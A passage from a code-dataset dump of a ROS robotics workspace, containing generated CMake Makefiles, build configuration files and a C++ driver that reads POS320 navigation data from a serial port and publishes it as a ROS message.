nav_msgs_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_cpp\"\n\t@echo \"... nav_msgs_generate_messages_eus\"\n\t@echo \"... nav_msgs_generate_messages_lisp\"\n\t@echo \"... path_generate_messages\"\n\t@echo \"... nav_msgs_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_py\"\n\t@echo \"... nav_msgs_generate_messages_py\"\n\t@echo \"... actionlib_msgs_generate_messages_lisp\"\n\t@echo \"... actionlib_msgs_generate_messages_nodejs\"\n\t@echo \"... driver\"\n\t@echo \"... pos320_genpy\"\n\t@echo \"... pos320_generate_messages_py\"\n\t@echo \"... pos320_generate_messages\"\n\t@echo \"... pos320_geneus\"\n\t@echo \"... simulator\"\n\t@echo \"... pos320_generate_messages_eus\"\n\t@echo \"... pos320_generate_messages_cpp\"\n\t@echo \"... pos320_generate_messages_lisp\"\n\t@echo \"... pos320_gencpp\"\n\t@echo \"... pos320_genlisp\"\n\t@echo \"... pos320_generate_messages_nodejs\"\n\t@echo \"... pos320_gennodejs\"\n\t@echo \"... pure_pursuit\"\n\t@echo \"... steer_genpy\"\n\t@echo \"... steer_gencpp\"\n\t@echo \"... steer_generate_messages_cpp\"\n\t@echo \"... steer_generate_messages\"\n\t@echo \"... steer_geneus\"\n\t@echo \"... steer_generate_messages_lisp\"\n\t@echo \"... steer_genlisp\"\n\t@echo \"... steer_generate_messages_nodejs\"\n\t@echo \"... steer_generate_messages_eus\"\n\t@echo \"... steer_gennodejs\"\n\t@echo \"... steer_generate_messages_py\"\n\t@echo \"... zfmsg_gennodejs\"\n\t@echo \"... zfmsg_genpy\"\n\t@echo \"... zfmsg_generate_messages_cpp\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_MotionCmd\"\n\t@echo \"... zfmsg_generate_messages\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_BreakStatus\"\n\t@echo \"... zfmsg_generate_messages_eus\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_SteerStatus\"\n\t@echo \"... zfmsg_gencpp\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfo\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfoAW\"\n\t@echo \"... zfmsg_generate_messages_py\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_ThrottleGearStatus\"\n\t@echo \"... zfmsg_geneus\"\n\t@echo \"... zfmsg_genlisp\"\n\t@echo \"... zfmsg_generate_messages_lisp\"\n\t@echo \"... zfmsg_generate_messages_nodejs\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.5793522000312805,
"alphanum_fraction": 0.6309716701507568,
"avg_line_length": 31.287582397460938,
"blob_id": "3001556ca7c3a808cfa5865783eef58a3f4c26eb",
"content_id": "95b63e168c1d0e1b70eccf54665d682fe621a605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4940,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 153,
"path": "/src/pos320/src/driver.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n\n#include \"zf_msgs/pos320.h\"\n\n#include <iostream>\n#include <sstream>\n\n#include <deque>\n#include <boost/bind.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/thread.hpp>\n#include <boost/endian/arithmetic.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/optional.hpp>\n\n\nusing namespace boost::endian;\n///using namespace Eigen;\n\nstruct Pos320Struct {\n little_uint8_t length;\n little_uint8_t mode;\n little_int16_t time1;\n little_int32_t time2;\n little_uint8_t num;\n};\n\n\nint main(int argc, char **argv)\n{\n std::cout.precision(11);\n std::cout.precision(9);\n ros::init(argc, argv, \"driver\");\n\n ros::NodeHandle n;\n\n ros::Publisher pos320_pub = n.advertise<zf_msgs::pos320>(\"pos320_pose\", 1000);\n\n /// relative to frequency of pos320\n ros::Rate loop_rate(30);\n\n /// defination of serial port for pos320\n /// set options for pos320_sp\n boost::asio::io_service io;\n boost::asio::serial_port pos320_sp(io,\"/dev/ttyUSB0\");\n\n pos320_sp.set_option(boost::asio::serial_port_base::baud_rate(115200));\n pos320_sp.set_option(boost::asio::serial_port_base::character_size(8));\n pos320_sp.set_option(boost::asio::serial_port_base::stop_bits(boost::asio::serial_port_base::stop_bits::one));\n pos320_sp.set_option(boost::asio::serial_port_base::parity(boost::asio::serial_port_base::parity::none));\n pos320_sp.set_option(boost::asio::serial_port_base::flow_control(boost::asio::serial_port_base::flow_control::none));\n boost::system::error_code ec;\n pos320_sp.open(\"/dev/ttyUSB0\", ec );\n if( !pos320_sp.is_open()){\n std::cout<< \"port not opened\" << std::endl;\n }\n std::cout<< \"port opened\" << std::endl;\n\n zf_msgs::pos320 pos320_data;\n\n bool is_initialized = false;\n\n int count = 0;\n while (ros::ok())\n {\n /// read pos32 data from serial port\n unsigned char c = 0;\n boost::asio::read(pos320_sp, boost::asio::buffer(&c, 1));\n if (0xaa != c && !is_initialized) {\n /// initializing\n if(c != 83){\n std::cout<<\"Initializing, \" << (int)c/ 2 <<\"\\% completed ......\" << std::endl;\n }\n if(c == 200){is_initialized = true;}\n continue;\n }\n boost::asio::read(pos320_sp, boost::asio::buffer(&c, 1));\n if (0x55 != c) {\n continue;\n }\n Pos320Struct p;\n boost::asio::read(pos320_sp, boost::asio::buffer(&p, sizeof(p)));\n double lat;\n boost::asio::read(pos320_sp, boost::asio::buffer(&lat, sizeof(lat)));\n double lon;\n boost::asio::read(pos320_sp, boost::asio::buffer(&lon, sizeof(lon)));\n float height;\n boost::asio::read(pos320_sp, boost::asio::buffer(&height, sizeof(height)));\n float v_n;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_n, sizeof(v_n)));\n float v_e;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_e, sizeof(v_e)));\n float v_earth;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_earth, sizeof(v_earth)));\n float roll;\n boost::asio::read(pos320_sp, boost::asio::buffer(&roll, sizeof(roll)));\n float pitch ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&pitch, sizeof(pitch)));\n float head ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&head, sizeof(head)));\n short a_n ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&a_n, sizeof(a_n)));\n short a_e ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&a_e, sizeof(a_e)));\n short a_earth;\n boost::asio::read(pos320_sp, boost::asio::buffer(&a_earth, sizeof(a_earth)));\n short v_roll;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_roll, sizeof(v_roll)));\n short v_pitch;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_pitch, sizeof(v_pitch)));\n short v_head;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_head, sizeof(v_head)));\n char status;\n boost::asio::read(pos320_sp, boost::asio::buffer(&status, sizeof(status)));\n int status1 = (status & 0xC0) >> 6;\n int status2 = status & 0x3f;\n boost::asio::read(pos320_sp, boost::asio::buffer(&c, 1));\n pos320_data.checksum = c;\n\n pos320_data.length= int(p.length);\n pos320_data.mode = p.mode;\n pos320_data.time1 = p.time1;\n pos320_data.time2 = p.time2;\n pos320_data.num = p.num;\n pos320_data.lat = lat;\n pos320_data.lon = lon;\n pos320_data.height= height;\n pos320_data.v_n = v_n;\n pos320_data.v_e = v_e;\n pos320_data.v_earth= v_earth;\n pos320_data.roll = roll;\n pos320_data.pitch = pitch/100;\n pos320_data.head = head;\n pos320_data.a_n = a_n;\n pos320_data.a_e = a_e;\n pos320_data.a_earth= a_earth;\n pos320_data.v_roll= v_roll;\n pos320_data.v_pitch= v_pitch;\n pos320_data.v_head= v_head;\n pos320_data.status1= status1;\n pos320_data.status2= status2;\n pos320_pub.publish(pos320_data);\n ros::spinOnce();\n std::cout<< lat<< \"\\t\"<< lon << \"\\n\";\n\n loop_rate.sleep();\n }\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.7383536100387573,
"alphanum_fraction": 0.7500487565994263,
"avg_line_length": 36.0843391418457,
"blob_id": "a6abaf7edc7b2f0271953c9db3ed12759a7e09c8",
"content_id": "36fe5d850ad7f597d6c3e0e4ab2ad119ab8e66c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 15391,
"license_type": "no_license",
"max_line_length": 222,
"num_lines": 415,
"path": "/build/steer/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/steer/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nsteer/CMakeFiles/pure_pursuit.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/pure_pursuit.dir/rule\n.PHONY : steer/CMakeFiles/pure_pursuit.dir/rule\n\n# Convenience name for target.\npure_pursuit: steer/CMakeFiles/pure_pursuit.dir/rule\n\n.PHONY : pure_pursuit\n\n# fast build rule for target.\npure_pursuit/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/build\n.PHONY : pure_pursuit/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_genpy.dir/rule\n.PHONY : steer/CMakeFiles/steer_genpy.dir/rule\n\n# Convenience name for target.\nsteer_genpy: steer/CMakeFiles/steer_genpy.dir/rule\n\n.PHONY : steer_genpy\n\n# fast build rule for target.\nsteer_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_genpy.dir/build.make steer/CMakeFiles/steer_genpy.dir/build\n.PHONY : steer_genpy/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_gencpp.dir/rule\n.PHONY : steer/CMakeFiles/steer_gencpp.dir/rule\n\n# Convenience name for target.\nsteer_gencpp: steer/CMakeFiles/steer_gencpp.dir/rule\n\n.PHONY : steer_gencpp\n\n# fast build rule for target.\nsteer_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_gencpp.dir/build.make steer/CMakeFiles/steer_gencpp.dir/build\n.PHONY : steer_gencpp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_cpp.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_cpp: steer/CMakeFiles/steer_generate_messages_cpp.dir/rule\n\n.PHONY : steer_generate_messages_cpp\n\n# fast build rule for target.\nsteer_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_cpp.dir/build.make steer/CMakeFiles/steer_generate_messages_cpp.dir/build\n.PHONY : steer_generate_messages_cpp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages: steer/CMakeFiles/steer_generate_messages.dir/rule\n\n.PHONY : steer_generate_messages\n\n# fast build rule for target.\nsteer_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages.dir/build.make steer/CMakeFiles/steer_generate_messages.dir/build\n.PHONY : steer_generate_messages/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_geneus.dir/rule\n.PHONY : steer/CMakeFiles/steer_geneus.dir/rule\n\n# Convenience name for target.\nsteer_geneus: steer/CMakeFiles/steer_geneus.dir/rule\n\n.PHONY : steer_geneus\n\n# fast build rule for target.\nsteer_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_geneus.dir/build.make steer/CMakeFiles/steer_geneus.dir/build\n.PHONY : steer_geneus/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_lisp.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_lisp: steer/CMakeFiles/steer_generate_messages_lisp.dir/rule\n\n.PHONY : steer_generate_messages_lisp\n\n# fast build rule for target.\nsteer_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_lisp.dir/build.make steer/CMakeFiles/steer_generate_messages_lisp.dir/build\n.PHONY : steer_generate_messages_lisp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_genlisp.dir/rule\n.PHONY : steer/CMakeFiles/steer_genlisp.dir/rule\n\n# Convenience name for target.\nsteer_genlisp: steer/CMakeFiles/steer_genlisp.dir/rule\n\n.PHONY : steer_genlisp\n\n# fast build rule for target.\nsteer_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_genlisp.dir/build.make steer/CMakeFiles/steer_genlisp.dir/build\n.PHONY : steer_genlisp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_nodejs.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_nodejs: steer/CMakeFiles/steer_generate_messages_nodejs.dir/rule\n\n.PHONY : steer_generate_messages_nodejs\n\n# fast build rule for target.\nsteer_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_nodejs.dir/build.make steer/CMakeFiles/steer_generate_messages_nodejs.dir/build\n.PHONY : steer_generate_messages_nodejs/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_eus.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_eus: steer/CMakeFiles/steer_generate_messages_eus.dir/rule\n\n.PHONY : steer_generate_messages_eus\n\n# fast build rule for target.\nsteer_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_eus.dir/build.make steer/CMakeFiles/steer_generate_messages_eus.dir/build\n.PHONY : steer_generate_messages_eus/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_gennodejs.dir/rule\n.PHONY : steer/CMakeFiles/steer_gennodejs.dir/rule\n\n# Convenience name for target.\nsteer_gennodejs: steer/CMakeFiles/steer_gennodejs.dir/rule\n\n.PHONY : steer_gennodejs\n\n# fast build rule for target.\nsteer_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_gennodejs.dir/build.make steer/CMakeFiles/steer_gennodejs.dir/build\n.PHONY : steer_gennodejs/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_py.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_py.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_py: steer/CMakeFiles/steer_generate_messages_py.dir/rule\n\n.PHONY : steer_generate_messages_py\n\n# fast build rule for target.\nsteer_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_py.dir/build.make steer/CMakeFiles/steer_generate_messages_py.dir/build\n.PHONY : steer_generate_messages_py/fast\n\nsrc/pure_pursuit.o: src/pure_pursuit.cpp.o\n\n.PHONY : src/pure_pursuit.o\n\n# target to build an object file\nsrc/pure_pursuit.cpp.o:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/src/pure_pursuit.cpp.o\n.PHONY : src/pure_pursuit.cpp.o\n\nsrc/pure_pursuit.i: src/pure_pursuit.cpp.i\n\n.PHONY : src/pure_pursuit.i\n\n# target to preprocess a source file\nsrc/pure_pursuit.cpp.i:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/src/pure_pursuit.cpp.i\n.PHONY : src/pure_pursuit.cpp.i\n\nsrc/pure_pursuit.s: src/pure_pursuit.cpp.s\n\n.PHONY : src/pure_pursuit.s\n\n# target to generate assembly for a file\nsrc/pure_pursuit.cpp.s:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/src/pure_pursuit.cpp.s\n.PHONY : src/pure_pursuit.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... install\"\n\t@echo \"... test\"\n\t@echo \"... pure_pursuit\"\n\t@echo \"... steer_genpy\"\n\t@echo \"... steer_gencpp\"\n\t@echo \"... steer_generate_messages_cpp\"\n\t@echo \"... install/local\"\n\t@echo \"... steer_generate_messages\"\n\t@echo \"... steer_geneus\"\n\t@echo \"... edit_cache\"\n\t@echo \"... steer_generate_messages_lisp\"\n\t@echo \"... steer_genlisp\"\n\t@echo \"... list_install_components\"\n\t@echo \"... install/strip\"\n\t@echo \"... steer_generate_messages_nodejs\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... steer_generate_messages_eus\"\n\t@echo \"... steer_gennodejs\"\n\t@echo \"... steer_generate_messages_py\"\n\t@echo \"... src/pure_pursuit.o\"\n\t@echo \"... src/pure_pursuit.i\"\n\t@echo \"... src/pure_pursuit.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7771739363670349,
"alphanum_fraction": 0.7989130616188049,
"avg_line_length": 45,
"blob_id": "d2e2519d768f1fbf11a655438675cfd202040b27",
"content_id": "9e176623fe3b974ca922cc73f564475770bb2d4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 4,
"path": "/devel/share/zfmsg/cmake/zfmsg-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(zfmsg_MSG_INCLUDE_DIRS \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg\")\nset(zfmsg_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7485029697418213,
"alphanum_fraction": 0.7485029697418213,
"avg_line_length": 40.75,
"blob_id": "ba841b64e7fb8314f7a11ea3f1fa4a60ff7cd354",
"content_id": "38704c3f9c8212c77725f19c3de41514bb1f592e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 4,
"path": "/build/path/catkin_generated/installspace/path-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${path_DIR}/..\" \"\" path_MSG_INCLUDE_DIRS UNIQUE)\nset(path_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7316666841506958,
"alphanum_fraction": 0.7383333444595337,
"avg_line_length": 53.54545593261719,
"blob_id": "1e79332bfbd2dd5b7150e87f547b17955f5d8512",
"content_id": "1a09c25190fe60e73738809f7a88a3891e8d5ff8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 600,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 11,
"path": "/build/steer/cmake/steer-genmsg-context.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.context.in\n\nmessages_str = \"\"\nservices_str = \"\"\npkg_name = \"steer\"\ndependencies_str = \"std_msgs;geometry_msgs;zf_msgs\"\nlangs = \"gencpp;geneus;genlisp;gennodejs;genpy\"\ndep_include_paths_str = \"std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;zf_msgs;/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg\"\nPYTHON_EXECUTABLE = \"/usr/bin/python\"\npackage_has_static_sources = '' == 'TRUE'\ngenmsg_check_deps_script = \"/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py\"\n"
},
{
"alpha_fraction": 0.7591623067855835,
"alphanum_fraction": 0.7706806063652039,
"avg_line_length": 29.80645179748535,
"blob_id": "71374e59e81f55754354abfa74e6fa8cea87af7f",
"content_id": "12cf1011d35599d9a2587cea836869351129e63c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 955,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 31,
"path": "/src/path/CMakeLists.txt",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
